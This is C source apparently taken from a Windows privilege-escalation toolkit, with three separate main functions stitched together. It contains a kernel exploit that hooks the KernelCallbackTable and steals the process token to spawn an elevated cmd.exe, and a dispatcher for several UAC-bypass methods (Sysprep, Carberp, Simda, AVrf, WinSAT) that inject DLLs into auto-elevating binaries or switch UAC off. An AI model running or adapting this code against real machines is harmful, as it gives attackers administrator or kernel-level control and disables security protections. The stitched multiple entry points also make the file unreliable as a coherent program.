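/*
* ucmInit
*
* Purpose:
*
* Prestart phase. Resets the shared g_ldp block and fills it with the data
* the rest of the tool relies on: module handles for kernel32, ole32 and
* shell32, the system directory, the OS version and whether this process
* is a 32-bit process.
*
* Return:
*
* ERROR_SUCCESS on success, otherwise one of:
*   ERROR_INVALID_HANDLE - a required module is not mapped and could not be loaded
*   ERROR_INVALID_DATA   - GetSystemDirectoryW failed or the path does not fit
*   ERROR_INVALID_ACCESS - RtlGetVersion failed
*
* Note: handles obtained through LoadLibraryW are deliberately kept for the
* lifetime of the process; nothing frees them.
*
*/
UINT ucmInit(
    VOID
)
{
    UINT cch;

    // Fill common data block. Everything below writes into g_ldp, so this
    // single zeroing also covers g_ldp.osver.
    RtlSecureZeroMemory(&g_ldp, sizeof(g_ldp));

    // Remember dll handles. There is no LoadLibraryW fallback for kernel32:
    // if it cannot be found by handle something is badly wrong already.
    g_ldp.hKernel32 = GetModuleHandleW(L"kernel32.dll");
    if (g_ldp.hKernel32 == NULL) {
        return ERROR_INVALID_HANDLE;
    }

    // ole32/shell32 may not be mapped yet; load them by bare name if needed.
    // NOTE(review): a bare name relies on these resolving from the system
    // directory rather than the application directory - confirm that holds
    // on every supported build if this code is reused elsewhere.
    g_ldp.hOle32 = GetModuleHandleW(L"ole32.dll");
    if (g_ldp.hOle32 == NULL) {
        g_ldp.hOle32 = LoadLibraryW(L"ole32.dll");
        if (g_ldp.hOle32 == NULL) {
            return ERROR_INVALID_HANDLE;
        }
    }

    g_ldp.hShell32 = GetModuleHandleW(L"shell32.dll");
    if (g_ldp.hShell32 == NULL) {
        g_ldp.hShell32 = LoadLibraryW(L"shell32.dll");
        if (g_ldp.hShell32 == NULL) {
            return ERROR_INVALID_HANDLE;
        }
    }

    // Query basic directories. GetSystemDirectoryW returns the number of
    // characters copied (without the terminator) on success, 0 on failure,
    // and the required size (with the terminator) when the buffer is too
    // small. Only a value below MAX_PATH means the buffer holds a complete,
    // terminated path; everything else is an error rather than a usable
    // (possibly partially filled) buffer.
    cch = GetSystemDirectoryW(g_ldp.szSystemDirectory, MAX_PATH);
    if ((cch == 0) || (cch >= MAX_PATH)) {
        return ERROR_INVALID_DATA;
    }

    // Query build number. The size field must be set before the call.
    g_ldp.osver.dwOSVersionInfoSize = sizeof(g_ldp.osver);
    if (!NT_SUCCESS(RtlGetVersion(&g_ldp.osver))) {
        return ERROR_INVALID_ACCESS;
    }

    // Remember whether we run as a 32-bit process; presumably the methods
    // use this to refuse running from under WOW64.
    g_ldp.IsWow64 = supIsProcess32bit(GetCurrentProcess());

    return ERROR_SUCCESS;
}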
/*
* main
*
* Purpose:
*
* Program entry point. Refuses to run on builds above 7601 or from a 32-bit
* process, resolves the kernel symbol and EPROCESS token offset the payload
* needs, then swaps entry 0x36 of the PEB KernelCallbackTable for hookCCI and
* creates a window (presumably to drive user32 through that callback). When
* g_shellCalled reports success, cmd.exe is started from %systemroot%\system32
* and the message loop runs until the window is gone. Always exits via
* ExitProcess; the non-zero exit codes identify which precondition failed.
*
*/
void main()
{
    PTEB teb = NtCurrentTeb();
    PPEB peb = teb->ProcessEnvironmentBlock;
    WNDCLASSEX wincls;
    HINSTANCE hinst = GetModuleHandle(NULL);
    BOOL rv = TRUE;
    MSG msg1;
    ATOM class_atom;
    HWND MainWindow;
    DWORD prot;
    OSVERSIONINFOW osver;
    DWORD cch;
    TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];
    STARTUPINFO startupInfo;
    PROCESS_INFORMATION processInfo;

    // Build gate: nothing above 7601 (Windows 7 SP1) is attempted.
    // NOTE(review): the RtlGetVersion result is not checked; because osver
    // is zeroed first, a failed call leaves dwBuildNumber at 0 and passes
    // this gate instead of failing closed.
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    if (osver.dwBuildNumber > 7601) {
        ExitProcess((UINT)-1);
        return;
    }

    // A 32-bit process is refused (exit code -2).
    if (supIsProcess32bit(GetCurrentProcess())) {
        ExitProcess((UINT)-2);
        return;
    }

    // Data the payload needs: our PID, the address of PsLookupProcessByProcessId
    // and the per-architecture EPROCESS.Token offset. The offsets are hard-coded
    // for the builds admitted by the gate above and are not validated here.
    g_OurPID = GetCurrentProcessId();
    g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();

#ifdef _WIN64
    g_EPROCESS_TokenOffset = 0x208;
#else
    g_EPROCESS_TokenOffset = 0xF8;
#endif

    if (g_PsLookupProcessByProcessIdPtr == NULL) {
        ExitProcess((UINT)-3);
        return;
    }

    // Window class whose procedure is MainWindowProc; the window itself is
    // created below with no size or parent.
    RtlSecureZeroMemory(&wincls, sizeof(wincls));
    wincls.cbSize = sizeof(WNDCLASSEX);
    wincls.lpfnWndProc = &MainWindowProc;
    wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
    wincls.lpszClassName = MAINWINDOWCLASSNAME;
    class_atom = RegisterClassEx(&wincls);

    // Single-pass loop used as a breakable scope so every failure path ends
    // at the UnregisterClass/ExitProcess tail below.
    while (class_atom) {

        g_w32theadinfo = teb->Win32ThreadInfo;

        // Slot 0x36 of the user-mode callback table, labelled by the author
        // as User32_ClientCopyImage. The index is hard-coded and, like the
        // offsets above, only valid for the builds admitted by the gate.
        g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36];

        // NOTE(review): the table is only written here, so PAGE_READWRITE would
        // be sufficient; RWX is broader than needed and the original protection
        // saved in 'prot' is never restored afterwards.
        if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot)) {
            break;
        }

        // Install the hook; the previous pointer is kept in g_originalCCI.
        // The hook is never removed because the process exits right after.
        g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI);

        MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom), NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);

        // g_shellCalled is presumably set by hookCCI once the payload has run.
        if (g_shellCalled == 1) {
            RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
            RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
            startupInfo.cb = sizeof(startupInfo);
            GetStartupInfo(&startupInfo);

            // Build the full path to cmd.exe from %systemroot%; the cch check
            // guarantees sysdir is terminated and that cmdbuf (twice MAX_PATH)
            // has room for the appended file name.
            RtlSecureZeroMemory(sysdir, sizeof(sysdir));
            cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
            if ((cch != 0) && (cch < MAX_PATH)) {
                RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
                _strcpy(cmdbuf, sysdir);
                _strcat(cmdbuf, TEXT("cmd.exe"));
                // Launched by full path (lpApplicationName), not by a bare
                // name, so it does not depend on the search path. The handles
                // are not needed afterwards and are closed at once.
                if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL, sysdir, &startupInfo, &processInfo)) {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                }
            }
        }
        else {
            OutputDebugString(TEXT(" Failed \r\n"));
        }

        if (!MainWindow)
            break;

        // Standard message pump: -1 signals a GetMessage error, 0 means WM_QUIT.
        do {
            rv = GetMessage(&msg1, NULL, 0, 0);
            if (rv == -1)
                break;
            TranslateMessage(&msg1);
            DispatchMessage(&msg1);
        } while (rv != 0);

        break;
    }

    if (class_atom)
        UnregisterClass(MAKEINTATOM(class_atom), hinst);

    ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point. Checks the environment first (Windows build 7000 or
* later, an administrator running with a limited/split token), then maps the
* first command line parameter ("1".."7") onto a METHOD_* value and runs the
* matching method. Unsupported combinations of method, build and WOW64 are
* reported through a message box; in every case the process ends with
* exit code 0.
*
*/

// Shows an informational box on top of the desktop window.
static VOID ucmpNotify(
    LPCWSTR Text
)
{
    MessageBoxW(GetDesktopWindow(), Text, PROGRAMTITLE, MB_ICONINFORMATION);
}

// Injection based methods cannot be used from a 32-bit (WOW64) process.
// Shows the standard WOW64 notice and returns TRUE when the caller must stop.
static BOOL ucmpRefuseWow64(
    BOOL IsWow64
)
{
    if (!IsWow64) {
        return FALSE;
    }
    ucmpNotify(WOW64STRING);
    return TRUE;
}

VOID main()
{
    // Command line value -> method, plus the trace emitted on selection.
    static const struct {
        LPCTSTR Arg;
        DWORD Method;
        LPCTSTR Notice;
    } methodTable[] = {
        { TEXT("1"), METHOD_SYSPREP,    TEXT("[UCM] Method Sysprep selected\n\r") },
        { TEXT("2"), METHOD_SYSPREP_EX, TEXT("[UCM] Method Sysprep_ex selected\n\r") },
        { TEXT("3"), METHOD_OOBE,       TEXT("[UCM] Method Oobe selected\n\r") },
#ifndef _WIN64
        { TEXT("4"), METHOD_APPCOMPAT,  TEXT("[UCM] Method AppCompat selected\n\r") },
#endif
        { TEXT("5"), METHOD_SIMDA,      TEXT("[UCM] Method Simda selected\n\r") },
        { TEXT("6"), METHOD_CARBERP,    TEXT("[UCM] Method Carberp selected\n\r") },
        { TEXT("7"), METHOD_CARBERP_EX, TEXT("[UCM] Method Carberp_ex selected\n\r") }
    };

    BOOL isWow64Process = FALSE;
    DWORD method = 0;
    DWORD paramLength = 0;
    SIZE_T i;
    WCHAR param[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE tokenType = TokenElevationTypeDefault;
    RTL_OSVERSIONINFOW osver;

    // Verify system version: anything before build 7000 is refused.
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    if (osver.dwBuildNumber < 7000) {
        ucmpNotify(TEXT("Unsupported version"));
        goto Done;
    }

    // Only an administrator whose current token is the limited half of a
    // split token is a meaningful target; anything else is refused.
    if (!supGetElevationType(&tokenType)) {
        goto Done;
    }
    if (tokenType != TokenElevationTypeLimited) {
        ucmpNotify(TEXT("Admin account with limited token required."));
        goto Done;
    }

    isWow64Process = supIsProcess32bit(GetCurrentProcess());

    // Parameter 1 selects the method. No or unknown parameter leaves method
    // at 0, which matches nothing below and silently ends the program.
    RtlSecureZeroMemory(param, sizeof(param));
    if (GetCommandLineParam(GetCommandLine(), 1, param, MAX_PATH, &paramLength)) {
        for (i = 0; i < sizeof(methodTable) / sizeof(methodTable[0]); i++) {
            if (lstrcmpi(param, methodTable[i].Arg) == 0) {
                OutputDebugString(methodTable[i].Notice);
                method = methodTable[i].Method;
                break;
            }
        }
    }

    // Sysprep_ex is only meant for Windows 8.1 (build 9600 and later).
    if ((method == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
        ucmpNotify(TEXT("This method is only for Windows 8.1 use"));
        goto Done;
    }

    switch (method) {

    case METHOD_SYSPREP:
    case METHOD_SYSPREP_EX:
    case METHOD_OOBE:
        // These inject a dll and do not use heaven's gate, so running from
        // under WOW64 is refused in release builds.
#ifndef _DEBUG
        if (ucmpRefuseWow64(isWow64Process)) {
            goto Done;
        }
#endif
        if (ucmStandardAutoElevation(method, INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

#ifndef _WIN64
    case METHOD_APPCOMPAT:
        // There is no RedirectEXE for x64, so this case exists in the
        // 32-bit build only.
        if (ucmAppcompatElevation()) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
#ifndef _DEBUG
        if (ucmpRefuseWow64(isWow64Process)) {
            goto Done;
        }
#endif
        // Destructive: asks for confirmation because UAC is switched off and
        // not switched back on by this tool.
        if (MessageBox(GetDesktopWindow(),
            TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
            PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
        {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (method == METHOD_CARBERP) {
            if (osver.dwBuildNumber > 9600) {
                ucmpNotify(TEXT("This method is only for Windows 7/8/8.1"));
                goto Done;
            }
            // There is no migmiz in syswow64 in 8+, so under WOW64 this is
            // usable on Windows 7 only.
            if ((osver.dwBuildNumber > 7601) && ucmpRefuseWow64(isWow64Process)) {
                goto Done;
            }
        }
        if (ucmWusaMethod(method, INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;
    }

Done:
    ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point. Two-phase dispatch on the first command line
* parameter: the first switch emits a trace and checks the prerequisites of
* the selected method (build number, bitness), the second runs it, with a
* WOW64 refusal in front of the injection based methods. Every refusal is
* reported through a message box and the process always ends with exit
* code 0 via Done.
*
*/
VOID main()
{
    BOOL IsWow64 = FALSE;
    DWORD bytesIO, dwType;
    WCHAR *p;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;
    RTL_OSVERSIONINFOW osver;

    // Verify system version: anything before build 7000 is refused.
    // The RtlGetVersion result is not checked, but osver is zeroed first, so
    // a failed call leaves dwBuildNumber at 0 and is refused here as well.
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    if (osver.dwBuildNumber < 7000) {
        MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    // Only an administrator running with the limited half of a split token
    // is accepted; a failed query ends the program silently.
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
        goto Done;
    }
    if (ElevType != TokenElevationTypeLimited) {
        MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    IsWow64 = supIsProcess32bit(GetCurrentProcess());

    // Phase 1: parse the method number and check per-method prerequisites.
    // There is no default case, so a number that is not a METHOD_* value
    // falls through both switches and the program just exits.
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
        // Single-argument, project-local strtoul; presumably returns 0 for
        // input that is not a number - confirm against its definition.
        dwType = strtoul(szBuffer);
        switch (dwType) {
        case METHOD_SYSPREP:
            // Windows 7/8 only (builds up to 9200).
            OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_SYSPREP_EX:
            // Windows 8.1 and later only (build 9600+).
            OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
            if (osver.dwBuildNumber < 9600) {
                MessageBox(GetDesktopWindow(), WINBLUEONLY, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_OOBE:
            OutputDebugString(TEXT("[UCM] Oobe\n\r"));
            break;
        case METHOD_REDIRECTEXE:
            // 32-bit build only; the x64 build refuses it here and has no
            // dispatch case for it below.
            OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;
        case METHOD_SIMDA:
            OutputDebugString(TEXT("[UCM] Simda\n\r"));
            break;
        case METHOD_CARBERP:
            OutputDebugString(TEXT("[UCM] Carberp\n\r"));
            break;
        case METHOD_CARBERP_EX:
            OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
            break;
        case METHOD_TILON:
            // Windows 7/8 only (builds up to 9200).
            OutputDebugString(TEXT("[UCM] Tilon\n\r"));
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_AVRF:
            OutputDebugString(TEXT("[UCM] AVrf\n\r"));
            break;
        case METHOD_WINSAT:
            OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
            break;
        case METHOD_SHIMPATCH:
            // 32-bit build only, same handling as METHOD_REDIRECTEXE.
            OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;
        }
    }

    // Phase 2: run the selected method.
    switch (dwType) {
    case METHOD_SYSPREP:
    case METHOD_SYSPREP_EX:
    case METHOD_OOBE:
    case METHOD_TILON:
        // These inject a dll and do not use heaven's gate, so running from
        // under WOW64 is refused in release builds.
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

    // AppCompat based methods exist in the 32-bit build only.
#ifndef _WIN64
    case METHOD_REDIRECTEXE:
    case METHOD_SHIMPATCH:
        if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
        // Injection based; refused under WOW64 in release builds.
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        // Destructive: asks for confirmation because UAC is switched off and
        // not switched back on by this tool.
        if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            // Carberp: Windows 7/8/8.1 only (builds up to 9600).
            if (osver.dwBuildNumber > 9600) {
                MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            // There is no migmiz in syswow64 in 8+, so under WOW64 this is
            // usable on Windows 7 only.
            if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
        }
        if (dwType == METHOD_CARBERP_EX) {
            // Carberp_ex injects and is refused under WOW64 in release builds.
#ifndef _DEBUG
            if (IsWow64) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
#endif
        }
        if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;

    case METHOD_AVRF:
        // Uses its own payload dll (AVRFDLL); refused under WOW64 in release builds.
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
            OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
        }
        break;

    case METHOD_WINSAT:
        // Dealing with the WOW64 environment (file system redirection) is
        // not worth it for a test tool, so a 32-bit process is refused in
        // every build, debug included.
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
        // The dll name handed to the method depends on the build: powrprof.dll
        // before 9200, devobj.dll from 9200 on.
        if (osver.dwBuildNumber < 9200) {
            p = L"powrprof.dll";
        }
        else {
            p = L"devobj.dll";
        }
        if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
        }
        break;
    }

Done:
    ExitProcess(0);
}